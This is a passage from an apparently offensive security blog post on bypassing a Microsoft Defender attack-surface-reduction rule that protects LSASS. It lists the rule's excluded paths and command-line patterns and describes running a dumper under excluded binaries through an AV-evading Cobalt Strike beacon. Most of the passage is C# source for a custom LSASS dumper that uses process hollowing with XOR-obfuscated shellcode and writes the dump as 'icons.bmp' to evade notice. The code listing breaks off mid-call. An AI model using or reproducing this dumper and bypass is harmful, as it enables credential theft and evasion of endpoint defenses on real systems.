l_3_0["%windir%\\system32\\DriverStore\\FileRepository\\hpqkbsoftwarecompnent.inf_amd64_*\\HotKeyServiceUWP.exe"] = 2
l_3_0["%windir%\\system32\\CompatTelRunner.exe"] = 2
l_3_0["%programfiles(x86)%\\Printer Properties Pro\\Printer Installer Client\\PrinterInstallerClient.exe"] = 2
l_3_0["%programfiles%\\Printer Properties Pro\\Printer Installer Client\\PrinterInstallerClient.exe"] = 2
l_3_0["%programfiles(x86)%\\Zscaler\\ZSATunnel\\ZSATunnel.exe"] = 2
l_3_0["%programfiles%\\Zscaler\\ZSATunnel\\ZSATunnel.exe"] = 2
l_3_0["%programfiles(x86)%\\ManageSoft\\Security Agent\\mgssecsvc.exe"] = 2
l_3_0["%programfiles%\\ManageSoft\\Security Agent\\mgssecsvc.exe"] = 2
l_3_0["%programfiles(x86)%\\Snow Software\\Inventory\\Agent\\snowagent.exe"] = 2
l_3_0["%programfiles%\\Snow Software\\Inventory\\Agent\\snowagent.exe"] = 2
l_3_0["c:\\windows\\system32\\WerFaultSecure.exe"] = 0
l_3_0["c:\\windows\\system32\\wbem\\WmiPrvSE.exe"] = 0
l_3_0["c:\\windows\\SysWOW64\\wbem\\WmiPrvSE.exe"] = 0
l_3_0["\\Device\\HarddiskVolume?\\Windows\\System32\\svchost.exe"] = 0
l_3_0["\\Device\\HarddiskVolume?\\Windows\\System32\\wbem\\wmiprvse.exe"] = 0
l_3_0["%windir%\\system32\\fsiso.exe"] = 2
return l_3_0
end
GetCommandLineExclusions = function()
-- function num : 0_3
local l_4_0 = "^\\\"?.:\\\\windows\\\\system32\\\\werfault\\.exe\\\"?((?!\\-s).)*$"
local l_4_1 = "\\\\powershell\\.exe\\\"?\\s+.+[a-z]:\\\\programdata\\\\microsoft\\\\windows defender advanced threat protection\\\\downloads\\\\psscript_[^\\.]+\\.ps1.+$"
local l_4_2 = {}
l_4_2[l_4_0] = 0
l_4_2[l_4_1] = 0
return l_4_2
end
As we can see in obtained output that we have four functions:
- GetRuleInfo (description about rule)
- GetMonitoredLocations (which location is monitored; lsass)
- GetPathExclusions (exclusions with absolute path; binaries and folders)
- GetCommandLineExclusions (command line exclusion)
Based on this, we can assume that not only the exclusion bypass with absolute path could be effective here, but also GetCommandLineExclusions gives us thought-starter things.
So, GetPathExclusions gives us a list of excluded paths that are permitted to perform lsass.exe dumps even with the ASR rule enabled. However, based on the test results, it was found that not all excluded paths function as expected.
Testing
I’ve sorted the result for better clarity and testing:
Path exclusion list
%windir%\system32\WerFaultSecure.exe
%windir%\system32\mrt.exe
%windir%\system32\svchost.exe
%windir%\system32\NETSTAT.EXE
%windir%\syswow64\NETSTAT.EXE
%windir%\system32\wbem\WmiPrvSE.exe
%windir%\SysWOW64\wbem\WmiPrvSE.exe
%windir%\system32\DriverStore\FileRepository\*\NVWMI\nvWmi64.exe
%programfiles(x86)%\Microsoft Intune Management Extension\ClientHealthEval.exe
%programfiles(x86)%\Microsoft Intune Management Extension\SensorLogonTask.exe
%programfiles(x86)%\Microsoft Intune Management Extension\Microsoft.Management.Services.IntuneWindowsAgent.exe
%programdata%\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\*\OpenHandleCollector.exe
%programfiles%\WindowsApps\Microsoft.GamingServices_*\gamingservices.exe
%programfiles(x86)%\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe
%programfiles(x86)%\Zoom\bin\CptHost.exe
%programfiles(x86)%\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
%programfiles(x86)%\Microsoft\Edge\Application\*\Installer\setup.exe
%programfiles(x86)%\Google\Update\GoogleUpdate.exe
%programfiles(x86)%\Splunk\bin\splunkd.exe
%programfiles(x86)%\Zscaler\ZSAUpm\ZSAUpm.exe
%programfiles(x86)%\Fortinet\FortiClient\FortiESNAC.exe
%programfiles(x86)%\FireEye\xagt\xagt.exe
%programfiles(x86)%\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
%programfiles(x86)%\Dropbox\Update\DropboxUpdate.exe
%programfiles(x86)%\HP\HP Touchpoint Analytics Client\Provider Data Sources\ProcInfo\ProcInfo.exe
%programfiles(x86)%\Common Files\Adobe\AdobeGCClient\AGMService.exe
%programfiles(x86)%\Tanium\Tanium Client\Tools\Detect3\TaniumDetectEngine.exe
%programfiles(x86)%\Airwatch\AgentUI\AWProcessCommands.exe
%programfiles(x86)%\Bit9\Parity Agent\Parity.exe
%programfiles(x86)%\Arctic Wolf Networks\Agent\ossec-agent.exe
%programfiles(x86)%\Cordaware\Infoband\Infoclient.exe
%programfiles(x86)%\Splunk\bin\splunk-regmon.exe
%programfiles(x86)%\Lenovo\VantageService\*\LenovoVantage-(LenovoBoostSystemAddin).exe
%programfiles(x86)%\Micro Focus\Discovery Agent\bin32\discagnt.exe
%programfiles(x86)%\Hewlett-Packard\Discovery Agent\bin32\discagnt.exe
%programfiles(x86)%\Micro Focus\Discovery Agent\Plugins\usage\discusge.exe
%programfiles(x86)%\Hewlett-Packard\Discovery Agent\Plugins\usage\discusge.exe
%programfiles(x86)%\Cisco\Cisco AnyConnect Secure Mobility Client\aciseagent.exe
%programfiles(x86)%\BigFix Enterprise\BES Client\BESClient.exe
%programfiles(x86)%\Logitech\LogiSync\sync-agent\LogiSyncHandler.exe
%programfiles(x86)%\ManageSoft\Tracker\ndtrack.exe
%programfiles(x86)%\Aternity Information Systems\Agent
%programfiles(x86)%\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe
%programfiles(x86)%\Common Files\Adobe\ARM\*\AdobeARMHelper.exe
%programfiles(x86)%\Common Files\Adobe\ARM\*\Temp\*\AdobeARMHelper.exe
%programfiles(x86)%\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe
%programfiles(x86)%\Aternity Information Systems\Update\AternityUpdate.exe
%programfiles(x86)%\Tanium\Tanium Client\TaniumClient.exe
%programfiles(x86)%\BraveSoftware\Update\BraveUpdate.exe
%programfiles(x86)%\SysTrack\LsiAgent\LsiSupervisor\*\LsiSupervisor.exe
%programfiles(x86)%\Cisco\Cisco HostScan\bin\ciscod.exe
%programfiles(x86)%\SysTrack\LsiAgent\LsiMods64.exe
%programfiles(x86)%\CheckPoint\Endpoint Connect\Watchdog\EPWD.exe
%programfiles(x86)%\CheckPoint\Endpoint Security\Endpoint Common\bin\cpda.exe
%programfiles(x86)%\VMware\VMware Tools
%programfiles(x86)%\VMware\VMware Horizon View Client
%programfiles(x86)%\Common Files\VMware\Remote Experience
%programfiles(x86)%\Cisco\Cisco AnyConnect Secure Mobility Client\acswgagent.exe
%programfiles(x86)%\N-able Technologies\Windows Agent\bin\agent.exe
%programfiles(x86)%\Digital Arts\AC\app\bin\acservice.exe
%programfiles(x86)%\MOTEX\LanScope Cat MR\Lspcmr.exe
%programfiles(x86)%\Power Automate Desktop\Microsoft.Flow.RPA.LauncherService.exe
%programfiles(x86)%\DesktopCentral_Agent\bin\dcagentservice.exe
%programfiles(x86)%\CheckPoint\Endpoint Security\Endpoint Common\bin\IDAFServerHostService.exe
%programfiles(x86)%\Arctic Wolf Networks\Agent\plugins\osquery\osqueryi.exe
%programfiles(x86)%\Btc\eAudytor\eAgent\Bin\qati.exe
%programfiles(x86)%\Adobe\Adobe Sync\CoreSync\customhook\CoreSyncCustomHook.exe
%programfiles(x86)%\NetSupport\NetSupport School
%programfiles(x86)%\UEMS_Agent\bin\dcagentservice.exe
%programfiles(x86)%\Google\Temp\*\GoogleUpdate.exe
%programfiles(x86)%\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroServicesUpdater.exe
%programfiles(x86)%\Ninite Agent\NiniteAgent.exe
%programfiles(x86)%\HP\HP Classroom Manager\Runplugin64.exe
%programfiles(x86)%\SysTrack\LsiAgent\LsiAgent.exe
%programfiles(x86)%\VMware\VMware Player\vmware-authd.exe
%programfiles(x86)%\Dameware Remote Everywhere Agent\BASupSysInf.exe
%programfiles(x86)%\Power Automate Desktop\Microsoft.Flow.RPA.*.exe
%programfiles(x86)%\Common Files\Adobe\Adobe Desktop Common\ElevationManager\Adobe Installer.exe
%programfiles(x86)%\Common Files\Adobe\Adobe Desktop Common\HDBox\Setup.exe
%programfiles(x86)%\SolarWinds
%programfiles(x86)%\checkmk\service\check_mk_agent.exe
%programfiles(x86)%\ClassPolicyAgent\PolicyAgent.exe
%programfiles(x86)%\VMware\VMware Workstation\vmware-authd.exe
%programfiles(x86)%\Balbix\Update\BalbixUpdate.exe
%programfiles(x86)%\Bradford Networks\Persistent Agent\bndaemon.exe
%programfiles(x86)%\Site24x7\WinAgent\monitoring\bin\MEAgentHelper.exe
%programfiles(x86)%\Site24x7\WinAgent\monitoring\bin\AppBin\Site24x7AppAgent.exe
%programfiles(x86)%\Cato Networks\Cato Client\winvpnclient.cli.exe
%programfiles(x86)%\ManageEngine\UEMS_Agent\bin\dcagentservice.exe
%programfiles(x86)%\Sky Product\SKYSEA Client View
%programfiles(x86)%\Tanium\Tanium Client\TaniumCX.exe
%programfiles(x86)%\xagt\xagt.exe
%programfiles(x86)%\Microsoft Azure Site Recovery\agent\s2RCM.exe
%programfiles(x86)%\Cisco\Cisco Secure Client
%programfiles(x86)%\HP\HP Touchpoint Analytics Client\TouchpointAnalyticsClientService.exe
%programfiles(x86)%\CyberCNSAgent\osqueryi.exe
%programfiles(x86)%\FortiMonitorAgent\bin\Aggregator.Agent.exe
%programfiles(x86)%\IBM\Notes\nsd.exe
%programfiles(x86)%\Riverbed\Steelhead Mobile\rbtmon.exe
%programfiles%\Avecto\Privilege Guard Client\DefendpointService.exe
%programfiles%\Intel\SUR\QUEENCREEK\x64\esrv_svc.exe
%programfiles%\Microsoft Monitoring Agent\Agent\HealthService.exe
%programfiles%\Microsoft Monitoring Agent\Agent\MOMPerfSnapshotHelper.exe
%programfiles%\Nexthink\Collector\Collector\nxtsvc.exe
%programfiles%\Splunk\bin\splunkd.exe
%programfiles%\Azure Advanced Threat Protection Sensor\*\Microsoft.Tri.Sensor.Updater.exe
%programfiles%\common files\microsoft shared\ClickToRun\Updates\*\OfficeClickToRun.exe
%programfiles%\Zscaler\ZSAUpm\ZSAUpm.exe
%programfiles%\Fortinet\FortiClient\FortiESNAC.exe
%programfiles%\FireEye\xagt\xagt.exe
%programfiles%\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
%programfiles%\Qualys\QualysAgent\QualysAgent.exe
%programfiles%\Altiris\Altiris Agent\AeXNSAgent.exe
%programfiles%\VMware\VMware Tools
%programfiles%\VMware\VMware Horizon View Client
%programfiles%\Common Files\VMware\Remote Experience
%programfiles%\Dell\DTP\InstrumentationSubAgent\Dell.TechHub.Instrumentation.SubAgent.exe
%programfiles%\Rapid7\Insight Agent\components\insight_agent\*\ir_agent.exe
%programfiles%\Microsoft RDInfra\RDMonitoringAgent_*\Agent\MonAgentCore.exe
%programfiles%\BMCSoftware\Client Management\Client\bin\mtxagent.exe
%programfiles%\DisplayLink Core Software\DisplayLinkHotDeskService.exe
%programfiles%\ManageSoft\Tracker\ndtrack.exe
%programfiles%\Websense\Websense Endpoint\wepsvc.exe
%programfiles%\Ricoh\Streamline NX\PC Client\jre\bin\java.exe
%programfiles%\Microsoft Monitoring Agent\Agent\Health Service State\Resources\*\pmfexe.exe
%programfiles%\Microsoft Monitoring Agent\Agent\MonitoringHost.exe
%programfiles%\AppSense\Application Manager\Agent\AMAgent.exe
%programfiles%\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
%programfiles%\osquery\osqueryd\osqueryd.exe
%programfiles%\Microsoft OneDrive\OneDriveStandaloneUpdater.exe
%programfiles%\CyberArk\Endpoint Privilege Manager\Agent\PASAgent\PASAgent.exe
%programfiles%\Palo Alto Networks\GlobalProtect\PanGPS.exe
%programfiles%\Smart-X\ControlUpAgent\Version*\cuAgent.exe
%programfiles%\Citrix\*\XenDesktopRestApiService.exe
%programfiles%\Palo Alto Networks\DEM\DEMAgentProcess.exe
%programfiles%\Phantom\IBSA\ibsaService.exe
%programfiles%\eGurkha\lib\AppPid.exe
%programfiles%\dynatrace\oneagent\agent\lib64\oneagentos.exe
%programfiles%\dynatrace\oneagent\agent\lib64\oneagentplugin.exe
%programfiles%\Remote Desktop WebRTC Redirector\MsRdcWebRTCSvc.exe
%programfiles%\Sophos\Sophos File Scanner\SophosFileScanner.exe
%programfiles%\NetSupport\NetSupport School
%programfiles%\OEM\AMS\Service\ams.exe
%programfiles%\Eracent\EPM\epm.exe
%programfiles%\Cybereason ActiveProbe\minionhost.exe
%programfiles%\Google\Temp\*\GoogleUpdate.exe
%programfiles%\Orbit\bin\osqueryd\windows\stable\osqueryd.exe
%programfiles%\1E\Client\1E.Client.exe
%programfiles%\Endgame\esensor.exe
%programfiles%\Microsoft Cloud Managed Desktop Extension\CMDExtension\Microsoft.Management.Services.CloudManagedDesktop.Agent.exe
%programfiles%\common files\microsoft shared\ClickToRun\OfficeClickToRun.exe
%programfiles%\Adobe\Adobe Creative Cloud Experience\libs\node.exe
%programfiles%\Fortinet\FortiClient\FortiProxy.exe
%programfiles%\Guardicore\gc-launcher.exe
%programfiles%\Microsoft Azure AD Connect Health Sync Agent\Insights\Microsoft.Identity.AadConnect.Health.AadSync.Host.exe
%programfiles%\Huntress\HuntressAgent.exe
%programfiles%\vast limits\uberAgent\uberAgent.exe
%programfiles%\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroServicesUpdater.exe
%programfiles%\Dell\DellOptimizer\DellOptimizer.exe
%programfiles%\Manufacturer\Endpoint Agent\edpa.exe
%programfiles%\CyberArk\Endpoint Privilege Manager\Agent\vf_agent.exe
%programfiles%\Morphisec\bin\ProtectorService64.exe
%programfiles%\Zoom\bin\CptHost.exe
%programfiles%\TOLLAD\GEMONPROC.exe
%programfiles%\SMS_CCM\CcmExec.exe
%programfiles%\HEAT Software\EMSSAgent\*\lmhost.exe
%programfiles%\Skyhigh\SCP\ScpService.exe
%programfiles%\VMware\VMware View\*\bin\wsnm.exe
%programfiles%\NetClean Technologies\ProActive\fsdaemon\bin\fsdaemon.exe
%programfiles%\Topaz OFD\Warsaw\core.exe
%programfiles%\Microsoft Dependency Agent\bin\MicrosoftDependencyAgent.exe
%programfiles%\Autodesk\AdODIS\V1\Setup\install_helper_tool.exe
%programfiles%\EPSON Projector\Easy Interactive Driver Ver.??\EIN_SV.exe
%programfiles%\FortiMonitorAgent\bin\Aggregator.Agent.exe
C:\Packages\Plugins\Microsoft.Azure.Diagnostics.IaaSDiagnostics\*\Monitor\x64\MonAgentCore.exe
C:\Packages\Plugins\Microsoft.Azure.Security.Monitoring.AzureSecurityWindowsAgent\*\Monitoring\Agent\Extensions\AzureSecurityPack\pmfexe.exe
C:\eGurkha\lib\AppPid.exe
C:\blp\API\Office Tools
C:\blp\Wintrv
%windir%\System32\DriverStore\FileRepository\hpanalyticscomp.*\x64\Provider Data Sources\ProcInfo\ProcInfo.exe
%windir%\system32\RtkAudUService64.exe
%windir%\system32\nvwmi64.exe
%windir%\system32\lpksetup.exe
%windir%\system32\LogonUI.exe
%windir%\system32\DriverStore\FileRepository\hpcustomcapcomp.inf_amd64_*\x64\AppHelperCap.exe
%windir%\system32\IntelBroadbandManagerSvc.exe
%windir%\AdminArsenal\PDQInventory-Scanner\service-1\PDQInventory-Scanner-1.exe
%windir%\RtkBtManServ.exe
%windir%\CarbonBlack\cb.exe
%windir%\LTSvc\LTSVC.exe
%windir%\CCM\CcmExec.exe
%windir%\CCM\SensorLogonTask.exe
%windir%\CCM\SleepAgentService.exe
%windir%\Sysmon64.exe
%windir%\sysmon.exe
%windir%\SysWOW64\CCM\CcmExec.exe
%windir%\Downloaded Program Files\f5epi.exe
%windir%\Temp\Ctx-*\Extract\TrolleyExpress.exe
%programdata%\Citrix\Citrix Receiver*\TrolleyExpress.exe
%programdata%\Citrix\Citrix Workspace *\TrolleyExpress.exe
%programdata%\App-V\*\*\Root\VFS\Windows\CCM\CcmExec.exe
%programfiles(x86)%\Citrix\Citrix Workspace *\TrolleyExpress.exe
%temp%\Ctx-*\Extract\TrolleyExpress.exe
%programfiles%\Quest\ChangeAuditor\Agent\NPSrvHost.exe
%programfiles%\Quest\ChangeAuditor\Service\ChangeAuditor.Service.exe
%programdata%\Microsoft\Windows Defender Advanced Threat Protection\SenseNDR\NdrSetup.exe
%windir%\system32\DriverStore\FileRepository\hpqkbsoftwarecompnent.inf_amd64_*\HotKeyServiceUWP.exe
%windir%\system32\CompatTelRunner.exe
%programfiles(x86)%\Printer Properties Pro\Printer Installer Client\PrinterInstallerClient.exe
%programfiles%\Printer Properties Pro\Printer Installer Client\PrinterInstallerClient.exe
%programfiles(x86)%\Zscaler\ZSATunnel\ZSATunnel.exe
%programfiles%\Zscaler\ZSATunnel\ZSATunnel.exe
%programfiles(x86)%\ManageSoft\Security Agent\mgssecsvc.exe
%programfiles%\ManageSoft\Security Agent\mgssecsvc.exe
%programfiles(x86)%\Snow Software\Inventory\Agent\snowagent.exe
%programfiles%\Snow Software\Inventory\Agent\snowagent.exe
c:\windows\system32\WerFaultSecure.exe
c:\windows\system32\wbem\WmiPrvSE.exe
c:\windows\SysWOW64\wbem\WmiPrvSE.exe
\Device\HarddiskVolume?\Windows\System32\svchost.exe
\Device\HarddiskVolume?\Windows\System32\wbem\wmiprvse.exe
%windir%\system32\fsiso.exeI have discovered that not all exclusions work as expected. Furthermore, I have not tested each exclusion individually. Below, you can find the results of the tests conducted. To bypass the ASR rule, we must execute our credential dumping tool (as you wish) on behalf of the relevant process. In the examples below, I’ve used a Cobalt Strike beacon, which successfully bypasses AV (this is something I’ve worked on).
Additionally, I have developed a custom LSASS dumper using the Process Hollowing technique to achieve the goal of working under a specific binary and obtaining an LSASS dump.
*** Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code.
I took as a basis a shellcode to dump the LSASS process written by Osanda. I’ve changed this shellcode a little bit, the dump file is saved with the name icons.bmp instead of lsass.dmp as in the original.
Of course putting files on target disk it’s bad OPSEC especially with the lsass.dmp name, lol.
Also I have used the NTSection set. It is a set of APIs provides a great alternative to VirtualAllocEx, WriteProcessMemory and VirtualProtectEx.
I based my approach on a shellcode for dumping the LSASS process, originally written by Osanda. I modified the shellcode, specifically changing the name of the dump file to icons.bmp, replacing the original lsass.dmp.
Naturally, placing files on the target disk, especially with a name like lsass.dmp, is poor OPSEC.
Additionally, I utilized the NTSection set, a collection of APIs that offer an effective alternative to VirtualAllocEx, WriteProcessMemory, and VirtualProtectEx.
Program.cs
using System;
using System.ComponentModel;
using System.Runtime.InteropServices;
using System.Threading;
namespace ldump
{
internal class Program
{
static public byte[] getData(byte[] buff)
{
byte[] result = new byte[buff.Length];
for (int i = 0; i < buff.Length; i++)
{
result[i] = (byte)(buff[i] ^ 0x77);
}
return result;
}
static void Main(string[] args)
{
string target;
string save_folder;
if (!nt.IsUserAnAdmin())
{
Console.WriteLine("[!] Not elevated");
Environment.Exit(0);
}
if (args.Length < 1)
{
Console.WriteLine("[!] Give arg {full path to binary}");
Environment.Exit(0);
}
if (args.Length == 2)
{
save_folder = args[1];
}
else
{
save_folder = "c:\\programdata";
}
target = args[0];
byte[] enc =
{
// shellcode after XOR (0x77) saved
0x9E, 0x6C, 0x74, 0x77, 0x77, 0xBB, 0xBB, 0xBB, 0x3F, 0xFE, 0x2B, 0x53,
0x7F, 0x3F, 0xFE, 0x03, 0x53, 0x67, 0x20, 0x3F, 0xF4, 0x9B, 0x67, 0x12,
0x3F, 0xFC, 0x73, 0x52, 0x17, 0x77, 0x77, 0x77, 0xFC, 0x86, 0x3F, 0xFC,
0x27, 0x6F, 0x3B, 0xFC, 0x3D, 0x67, 0x3A, 0xFC, 0x36, 0x47, 0x3A, 0xF2,
0xB7, 0x78, 0xF3, 0xCF, 0x77, 0x77, 0x77, 0x36, 0x78, 0x67, 0x36, 0x2F,
0x3E, 0x14, 0x37, 0x4B, 0x3A, 0xFC, 0x7E, 0x35, 0xFC, 0xEB, 0x77, 0xFF,
0x77, 0x77, 0x77, 0x44, 0xA5, 0x84, 0x78, 0x08, 0x73, 0x53, 0xF2, 0xAC,
0x03, 0xA3, 0x3F, 0xFC, 0x73, 0x53, 0x3F, 0xB6, 0x9F, 0x67, 0x33, 0x78,
0xC0, 0xA7, 0x32, 0xF2, 0xA5, 0x03, 0x57, 0x3F, 0xFC, 0x3B, 0x53, 0x7F,
0x32, 0xFC, 0xAD, 0xB6, 0xBD, 0x7A, 0xF7, 0x4E, 0x16, 0x78, 0xC9, 0x76,
0x0B, 0x74, 0xF4, 0xB5, 0x97, 0x74, 0xA7, 0x3F, 0x88, 0xB6, 0x3E, 0x88,
0xBC, 0x02, 0x9F, 0x3A, 0xFA, 0x63, 0x6F, 0x44, 0xBE, 0x36, 0xFC, 0x0D,
0x57, 0x3E, 0x74, 0x8F, 0x36, 0x4E, 0x3D, 0x6F, 0x01, 0xE7, 0xFC, 0x68,
0x32, 0x44, 0xAC, 0x3F, 0xFA, 0x08, 0x73, 0x3E, 0x74, 0xAF, 0x36, 0xB6,
0xBC, 0x7A, 0x78, 0xC9, 0x74, 0x3F, 0x88, 0xB4, 0x33, 0x74, 0xAF, 0xF7,
0x0C, 0x88, 0x77, 0x02, 0x9A, 0x36, 0xFA, 0x73, 0x64, 0x4C, 0xB1, 0x03,
0x7A, 0x88, 0xB6, 0x36, 0x4C, 0x3D, 0x6F, 0x05, 0xA6, 0x9E, 0x2B, 0x88,
0x88, 0x88, 0x36, 0xFC, 0x35, 0x53, 0x74, 0xBE, 0x3E, 0x74, 0xB7, 0x78,
0xC0, 0x73, 0x76, 0x36, 0xFC, 0x3D, 0x6B, 0xB6, 0x97, 0x75, 0x3F, 0xEF,
0x3E, 0x74, 0xB7, 0xFC, 0x73, 0x76, 0x3E, 0x74, 0xB7, 0x9C, 0x75, 0x44,
0xB7, 0x3F, 0xFC, 0x2B, 0x53, 0x57, 0x3F, 0xFC, 0x03, 0x53, 0x5F, 0x3F,
0xF4, 0xB3, 0x67, 0x28, 0xB4, 0xBB, 0xBB, 0xBB, 0x37, 0x22, 0x24, 0x21,
0x20, 0x36, 0x23, 0x36, 0x22, 0x36, 0x21, 0x36, 0x20, 0x3F, 0xFA, 0xDB,
0x53, 0x5F, 0x88, 0x88, 0x88, 0x3F, 0xF6, 0x9B, 0xAF, 0x76, 0x77, 0x77,
0x44, 0xB7, 0x3F, 0xFA, 0x0A, 0xD7, 0xCE, 0x47, 0x76, 0x77, 0x77, 0x84,
0xDD, 0x32, 0x44, 0x81, 0xCE, 0x3B, 0x00, 0x51, 0x70, 0xB0, 0x32, 0xF7,
0x1C, 0x12, 0x05, 0x19, 0xB0, 0x32, 0xF3, 0x12, 0x1B, 0x44, 0x45, 0xB0,
0x32, 0xFF, 0x59, 0x13, 0x1B, 0x1B, 0x33, 0xFF, 0x02, 0xFB, 0xB0, 0x33,
0x53, 0x07, 0x13, 0x15, 0x10, 0x14, 0xB0, 0x33, 0x53, 0x03, 0x18, 0x05,
0x12, 0x59, 0xB0, 0x33, 0x53, 0x0F, 0x13, 0x1B, 0x1B, 0x77, 0xB0, 0x33,
0x53, 0x17, 0x19, 0x03, 0x13, 0x1B, 0xB0, 0x33, 0x53, 0x13, 0x1B, 0x59,
0x13, 0x1B, 0x11, 0xB0, 0x33, 0x53, 0x1F, 0x1B, 0x77, 0xB0, 0x33, 0x53,
0x27, 0x1E, 0x14, 0x18, 0x19, 0xB0, 0x33, 0x53, 0x23, 0x04, 0x59, 0x15,
0x1A, 0x11, 0xB0, 0x33, 0x53, 0x2F, 0x07, 0x77, 0xB0, 0x33, 0x53, 0x37,
0x1B, 0x04, 0x16, 0x04, 0xB0, 0x33, 0x53, 0x33, 0x04, 0x59, 0x12, 0x0F,
0x11, 0xB0, 0x33, 0x53, 0x3F, 0x12, 0x77, 0xB1, 0xF2, 0x57, 0x76, 0x77,
0x77, 0x16, 0x9F, 0x26, 0x89, 0x88, 0x88, 0x3F, 0xFA, 0x3A, 0xF7, 0x3F,
0xFC, 0x8F, 0x88, 0xA0, 0x3F, 0xFA, 0x3B, 0x53, 0x07, 0x88, 0xA0, 0x3F,
0xFA, 0x3B, 0x53, 0x17, 0x88, 0xA0, 0xCE, 0xF7, 0x4E, 0x69, 0xE5, 0x9F,
0x47, 0x89, 0x88, 0x88, 0xCE, 0xAD, 0x81, 0xAD, 0x38, 0x3F, 0xFC, 0x87,
0x9F, 0x54, 0x89, 0x88, 0x88, 0xCE, 0x50, 0xDE, 0x9F, 0x10, 0x3F, 0xFC,
0x8F, 0x9F, 0x61, 0x89, 0x88, 0x88, 0xCE, 0xFA, 0x25, 0x76, 0xCA, 0x3F,
0xFC, 0xAF, 0x9F, 0x7E, 0x89, 0x88, 0x88, 0xCE, 0x03, 0x06, 0xFA, 0xAB,
0x3B, 0xFC, 0x97, 0x9F, 0x8B, 0x8A, 0x88, 0x88, 0xCE, 0xC3, 0x04, 0xFA,
0x95, 0x3B, 0xFC, 0x8F, 0x9F, 0x98, 0x8A, 0x88, 0x88, 0xCE, 0x99, 0xE2,
0xC1, 0x27, 0x3B, 0xFC, 0x9F, 0x9F, 0x95, 0x8A, 0x88, 0x88, 0xCE, 0x4A,
0xA0, 0xBF, 0x19, 0x3F, 0xFE, 0xF2, 0x47, 0x76, 0x77, 0x77, 0x9F, 0xA6,
0x8A, 0x88, 0x88, 0xCE, 0x0D, 0x6E, 0x00, 0x1D, 0x3F, 0xFE, 0x32, 0xE7,
0x9F, 0xB4, 0x8A, 0x88, 0x88, 0x3B, 0xFA, 0xFA, 0x5F, 0x76, 0x77, 0x77,
0x36, 0xFA, 0x39, 0x63, 0x32, 0x44, 0xB7, 0xC5, 0x76, 0x88, 0xA7, 0x3B,
0x56, 0x03, 0x53, 0x47, 0x3F, 0xFA, 0x3B, 0x53, 0x27, 0x32, 0x44, 0xBE,
0x32, 0x44, 0xB7, 0xCD, 0x77, 0x77, 0x77, 0x67, 0xB0, 0x33, 0x53, 0x5F,
0xF7, 0x77, 0x77, 0x77, 0xB0, 0x33, 0x53, 0x57, 0x75, 0x77, 0x77, 0x77,
0x88, 0xA0, 0x44, 0xA5, 0x3F, 0xFE, 0xF2, 0x4F, 0x76, 0x77, 0x77, 0xFA,
0x3D, 0x75, 0x88, 0xA1, 0x3F, 0xFA, 0x22, 0xD7, 0xB0, 0x32, 0xD7, 0x47,
0x76, 0x77, 0x77, 0x3F, 0xFC, 0xBF, 0x3F, 0xFC, 0x8F, 0x88, 0xA4, 0x44,
0xAC, 0xF2, 0xB7, 0x03, 0x46, 0x9C, 0x6B, 0x3F, 0xFA, 0x22, 0xD7, 0x3F,
0xFC, 0xB8, 0x36, 0x88, 0xA3, 0x3F, 0xFA, 0x22, 0xBB, 0x3F, 0xFA, 0xFA,
0x57, 0x76, 0x77, 0x77, 0x36, 0x88, 0xA2, 0x33, 0xFC, 0x02, 0xDF, 0x3F,
0xFA, 0x23, 0x53, 0x37, 0x3F, 0xFA, 0xFA, 0x57, 0x76, 0x77, 0x77, 0x36,
0x88, 0xA0, 0xF2, 0xB7, 0x02, 0xA6, 0x32, 0xFC, 0xB1, 0x44, 0xA5, 0xCE,
0x88, 0x88, 0x68, 0x77, 0x88, 0xE2, 0x47, 0x76, 0x77, 0x77, 0x3B, 0xFC,
0xF2, 0x4F, 0x76, 0x77, 0x77, 0x3F, 0xFE, 0x2B, 0x53, 0x47, 0x3F, 0xFC,
0xBF, 0x36, 0xCE, 0x75, 0x77, 0x77, 0x77, 0x36, 0xFC, 0xA1, 0x3F, 0xFE,
0x2B, 0x53, 0x5F, 0x3F, 0xFE, 0x2B, 0x53, 0x57, 0x88, 0x22, 0xE7, 0x3F,
0xF6, 0xB3, 0xAF, 0x76, 0x77, 0x77, 0x36, 0x28, 0x36, 0x29, 0x36, 0x2A,
0x36, 0x2B, 0x28, 0x29, 0x2C, 0x2A, 0xB4, 0xBB, 0x21, 0x3F, 0xFC, 0x83,
0x3F, 0xF4, 0x93, 0x87, 0x3F, 0xF4, 0x9B, 0x57, 0x9F, 0xA4, 0x8A, 0x88,
0x88, 0x3F, 0xFC, 0x91, 0x29, 0xB4
};
byte[] messagebox = getData(enc);
var si = new nt.STARTUPINFO();
si.cb = Marshal.SizeOf(si);
var pa = new nt.SECURITY_ATTRIBUTES();
pa.nLength = Marshal.SizeOf(pa);
var ta = new nt.SECURITY_ATTRIBUTES();
ta.nLength = Marshal.SizeOf(ta);
var pi = new nt.PROCESS_INFORMATION();
var success = nt.CreateProcessW(
target,
null,
ref ta,
ref pa,
false,
0x00000004, // CREATE_SUSPENDED
IntPtr.Zero,
save_folder,
ref si,
out pi);
if (!success)
throw new Win32Exception(Marshal.GetLastWin32Error());
var hSection = IntPtr.Zero;
var maxSize = (ulong)messagebox.Length;
// Create a new section in the current process
nt.NtCreateSection(
ref hSection,
0x10000000, // SECTION_ALL_ACCESS
IntPtr.Zero,
ref maxSize,
0x40, // PAGE_EXECUTE_READWRITE
0x08000000, // SEC_COMMIT
IntPtr.Zero);
var localBaseAddress = IntPtr.Zero;
// Map that section into memory of the current process as RW
nt.NtMapViewOfSection(
hSection,
(IntPtr)(-1), // will target the current process
out localBaseAddress,
IntPtr.Zero,
IntPtr.Zero,
IntPtr.Zero,
out var _,
2, // ViewUnmap (created view will not be inherited by child processes)
0,
0x04); // PAGE_READWRITE
// Copy shellcode into memory of our own process
Marshal.Copy(messagebox, 0, localBaseAddress, messagebox.Length);
var remoteBaseAddress = IntPtr.Zero;
// Now map this region into the target process as RX
nt.NtMapViewOfSection(
hSection,
pi.hProcess,
out remoteBaseAddress,
IntPtr.Zero,
IntPtr.Zero,
